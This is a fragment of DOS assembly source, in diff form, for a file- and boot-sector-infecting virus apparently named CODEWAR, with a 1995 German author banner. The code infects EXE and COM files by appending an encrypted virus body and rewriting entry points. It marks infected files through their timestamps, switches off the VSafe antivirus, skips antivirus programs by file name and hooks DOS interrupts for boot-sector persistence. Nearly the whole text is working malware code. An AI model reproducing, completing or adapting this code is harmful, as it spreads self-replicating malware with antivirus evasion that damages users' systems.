+ popa\r
+\r
+ JMP Exit_Int_21\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+goto_Infect_Ret:\r
+ jmp Infect_Ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Process_EXE:\r
+ mov byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE\r
+\r
+; save handle\r
+ mov word ptr cs:[ofs Handle -Reloc],bx\r
+\r
+; Dont infect to big/small EXE-files!\r
+ mov word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc] ; EXE size in 512 byte pages\r
+ cmp AX,F_Min_LengthEXE ; Don't infect files less than xxxx pages\r
+ JB goto_Infect_Ret\r
+ cmp AX,F_Max_LengthEXE ; Or bigger than xxxx pages\r
+ JA goto_Infect_Ret\r
+\r
+; save handle\r
+ push bx\r
+\r
+; seek to EOF\r
+\r
+ CALL Seek_EOF\r
+\r
+\r
+; It's OK! Process it now !\r
+ les ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc] ;Entry_Point_Disp\r
+ mov cs:[ofs Old_IP -Reloc],ax\r
+ mov cs:[ofs Old_CS -Reloc],es\r
+\r
+ les ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc] ;Stack_Disp\r
+ mov cs:[ofs Old_SS -Reloc],ax\r
+ mov cs:[ofs Old_SP -Reloc],es\r
+\r
+ mov ax,cs:[ofs File_Buffer.Buf_8h -Reloc] ; = Header size in paras\r
+ mov cl,4\r
+ shl ax,cl ; Convert to byte-format\r
+\r
+; Get file size from SFT\r
+ push ax ; Save header size\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+ mov dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+ mov cx,cs:[ofs File_SizeLo -Reloc]\r
+ MOV CH,CL\r
+ MOV CL,16\r
+ SUB CL,CH\r
+ AND CX,1+2+4+8\r
+ add ax,cx\r
+\r
+; save the padding-number\r
+ mov cs:[ofs Padded -reloc],cx\r
+\r
+ pop bx ; = Header size\r
+\r
+ sub ax,bx ; DX:AX := file size - header size\r
+ sbb dx,0\r
+\r
+ mov cx,16 ; Convert to seg:ofs format\r
+\r
+ div cx ; DX:AX := (DX:AX) / 10h\r
+\r
+ or dx,dx ; IP\r
+ jz was_rounded\r
+\r
+ xor dx,dx\r
+ mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP\r
+ mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS\r
+\r
+ inc word ptr cs:[ofs File_Buffer.Buf_16h -Reloc] ; CS\r
+ jmp rounded\r
+\r
+was_rounded:\r
+ mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP\r
+ mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS\r
+\r
+rounded:\r
+ inc ax ; Avoid the "K" TB-flag (seems unecessary)\r
+ mov word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax ; New SS\r
+ mov word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0 ; New SP\r
+\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+ mov dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+ add ax,cs:[ofs Padded -reloc]\r
+ add dx,0\r
+\r
+\r
+ add ax,Virus_Length ; Lo-word\r
+ adc dx,0 ; Hi-word\r
+\r
+ push ax ; Lo-word\r
+ shr ax,9 ;\r
+ ror dx,9\r
+ stc\r
+ adc dx,ax\r
+ pop ax\r
+\r
+ and ah,1 ; Mod 512\r
+ mov cs:[ofs File_Buffer.Buf_4h -Reloc],dx ; Size in pages (rounded up)\r
+ mov cs:[ofs File_Buffer.Buf_2h -Reloc],ax ; Size of last page (in bytes)\r
+\r
+ push cs cs\r
+ pop ds es\r
+\r
+\r
+ mov word ptr bx,cs:[ofs Handle -Reloc]\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+\r
+ CALL Padding\r
+\r
+; Construct index for decryptor\r
+\r
+ PUSH AX\r
+\r
+ MOV word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf\r
+ MOV word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)\r
+ MOV word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)\r
+\r
+ POP AX\r
+\r
+ pop bx\r
+ jmp Attach\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Infect:\r
+\r
+ CALL Seek_TOF\r
+\r
+; read xx bytes\r
+\r
+ MOV AH,3Fh\r
+ MOV CX,Header_Length\r
+ MOV DX,ofs File_buffer -Reloc\r
+ INT 21h\r
+ jnb read_ok\r
+ jmp Infect_Ret\r
+\r
+read_ok:\r
+ cmp word ptr cs:[ofs File_buffer -Reloc],"ZM"\r
+ jnz Process_COM\r
+ jmp Process_EXE\r
+\r
+;----------------------------------------------------------------------------\r
+Process_COM:\r
+\r
+ mov byte ptr cs:[ofs File_Type -Reloc],File_Type_COM\r
+\r
+\r
+; seek to EOF\r
+\r
+ CALL Seek_EOF\r
+\r
+; Save 3 bytes\r
+\r
+ MOV ax,word ptr DS:[File_buffer -Reloc]\r
+ MOV DS:[ofs Rest1 -Reloc],ax\r
+ MOV al,byte ptr DS:[File_buffer -Reloc +2]\r
+ MOV DS:[ofs Rest2 -Reloc],al\r
+\r
+ CALL Seek_EOF\r
+\r
+; file smaller than xxxx bytes ?\r
+\r
+ CMP AX,F_Min_LengthCOM\r
+ JB Infect_Ret\r
+\r
+; file larger than xxxx bytes ?\r
+\r
+ CMP AX,F_Max_LengthCOM\r
+ JA Infect_Ret\r
+\r
+\r
+ CALL Padding\r
+\r
+\r
+; Construct index for decryptor\r
+\r
+ PUSH AX\r
+\r
+; layer 1\r
+ ADD AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf\r
+ MOV DS:[ofs E1_Idx_Val -Reloc],AX\r
+\r
+; layer 2\r
+ pop ax\r
+ push ax\r
+\r
+ ADD AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)\r
+ MOV DS:[ofs E2_Idx_Val -Reloc],AX\r
+\r
+; layer 3\r
+ pop ax\r
+ push ax\r
+\r
+ ADD AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)\r
+ MOV DS:[ofs E3_Idx_Val -Reloc],AX\r
+\r
+\r
+ POP AX\r
+\r
+; construct and insert a JUMP-INSTR.\r
+\r
+ MOV byte ptr DS:[File_buffer -Reloc],0E9h\r
+ SUB AX,3\r
+ MOV word ptr DS:[File_buffer+1 -Reloc],AX\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Attach:\r
+\r
+; write body at EOF\r
+\r
+ MOV AH,40h\r
+ MOV CX,Virus_Length\r
+ MOV DX,ofs Buffer -Reloc\r
+ CALL Encrypt_Virus\r
+ INT 21h\r
+ JB Infect_Ret\r
+\r
+; write JUMP to TOF\r
+\r
+ MOV AL,0\r
+ CALL Seek_TOF\r
+\r
+ MOV AH,40h\r
+ MOV CX,Header_Length\r
+ MOV DX,ofs File_buffer -Reloc\r
+ INT 21h\r
+\r
+; restore time stamps\r
+\r
+ mov AX,5701h\r
+ mov cx,cs:[ofs Old_Time -Reloc]\r
+ mov dx,cs:[ofs Old_Date -Reloc]\r
+ and cl,11100000b\r
+ or cl,Time_Stamp ; Mark with Time-ID\r
+ INT 21h\r
+\r
+Infect_Ret:\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Padding:\r
+ MOV AH,AL\r
+ MOV AL,16\r
+ SUB AL,AH\r
+ AND AX,1+2+4+8\r
+ MOV DX,AX\r
+\r
+; seek forward\r
+ MOV AL,01h\r
+ call Seek_File\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Deinstall_Vsafe:\r
+ pusha\r
+ push ds es\r
+\r
+ MOV DX,5945h\r
+ MOV AX,0FA01h\r
+ INT 16h\r
+\r
+ pop es ds\r
+ popa\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Check_If_AV_Name proc near\r
+ cmp byte ptr es:[di.SFT_File_Name],"L"\r
+ jz Found_AV_Name\r
+ cmp byte ptr es:[di.SFT_File_Name],"-"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"BT"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"CS"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"-F"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"IV"\r
+ jz Found_AV_Name\r
+Found_AV_Name:\r
+ ret\r
+Check_If_AV_Name endp\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Seek_EOF:\r
+ MOV AL,02h\r
+Seek_TOF:\r
+ XOR DX,DX\r
+Seek_File:\r
+ MOV AH,42h\r
+ XOR CX,CX\r
+ INT 21h\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int21 PROC NEAR\r
+ pushf\r
+ call dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+ ret\r
+Call_Old_Int21 ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int2F PROC NEAR\r
+ pushf\r
+ call dword ptr cs:(ofs Old_Int_2F -Reloc)\r
+ ret\r
+Call_Old_Int2F ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_24:\r
+ MOV AL,03h\r
+ IRET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Old_Int_13 dd 0\r
+Old_Int_1C dd 0\r
+Old_Int_21 dd 0\r
+\r
+Old_Int_2f dd 0\r
+\r
+Old_Time dw 0\r
+Old_Date dw 0\r
+\r
+Handle dw 0\r
+\r
+; If Int 21h allready captured then 1 else 0\r
+Got_Int_21 db 0\r
+\r
+File_SizeHi dw 0\r
+File_SizeLo dw 0\r
+\r
+Padded dw 0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+BS_first_word dw 0\r
+Old_BS_code db 32 dup ('B')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; The first word of the PAR/BS is stored here\r
+\r
+JBS_first_word:\r
+ jmp $ + 60h\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Start_JBoot:\r
+ XOR DI,DI\r
+ MOV SI,7C00h\r
+\r
+ CLI\r
+ MOV SP,SI\r
+ MOV SS,DI\r
+ STI\r
+\r
+; read xx sectors to 7e00h\r
+\r
+ MOV ES,DI\r
+ MOV AX,0204h ; !!!!!! Sectors !!!!!!\r
+ MOV BX,7c00h+512\r
+\r
+ MOV CX,1234h\r
+ ORG $-2\r
+Ptc_CX dw 0004h\r
+\r
+ MOV DX,1234h\r
+ ORG $-2\r
+Ptc_DX dw 0080h\r
+\r
+ nop\r
+ nop\r
+\r
+ INT 13h\r
+\r
+; Jump to the reload code from 2 sectors\r
+; The offset in the BS/PAR where this instuction is executed is at\r
+; BS/PAR:60h+($-Start_Jboot)\r
+\r
+ jmp $ + 512 - ($-Start_Jboot+60h) ;+512 -125\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+ db " [[ Cú0úDúEúWúAúR ]] <32> Germany 1995 "\r
+ db "Virtually called to life & survival by"\r
+\r
+ db "RGOEPMSQO & NJOENBOJBD"\r
+\r
+ db " ==>= AllE GUtEN DiNGE SiND DREi ==>= "\r
+\r
+ db 0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Encrypted_Code_End equ $\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+File_buffer:\r
+ db Header_Length dup ('H')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; here is the virus copied and encrypted\r
+Buffer equ $\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+CODE ENDS\r
+ END Sample\r
+\r
+\r
+; CODEWAR.ASM\r
+\1a
\ No newline at end of file